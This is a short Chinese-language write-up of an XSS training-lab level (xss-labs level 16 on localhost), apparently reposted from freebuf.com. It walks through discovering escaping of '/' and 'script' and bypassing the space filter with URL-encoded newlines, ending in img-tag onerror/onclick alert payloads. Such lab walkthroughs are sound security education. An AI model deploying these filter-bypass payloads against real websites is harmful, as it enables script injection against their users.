view-source:http://localhost/xss-labs/level16.php?keyword=test
可见,test字段位于<center>标签之间。
尝试构造一个PAYLOAD:
</center><script>alert(1)</script><center>
view-source:http://localhost/xss-labs/level16.php?keyword=%3C/center%3E%3Cscript%3Ealert(1)%3C/script%3E%3Ccenter%3E
可见这里存在转义:
/和script被转义为
咱们这里,直接查看后台源代码:
所以,这里要构造的PAYLOAD要跳过以上的过滤条件!!!
1、空格过滤,采用回车,TAB都能跳过
2、斜线过滤,我们要采用不需要闭合的标签
这里的回车,我们采用URL进行编码!!!%0a
构造PAYLOAD!!!
<img%0asrc=1%0aonclick=alert(1)>
<img%0asrc=1%0aonerror=alert(1)> 第二种其实更好,因为点都不用点了!!
来源:freebuf.com 2021-08-01 16:21:12 by: 知非知非知非
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册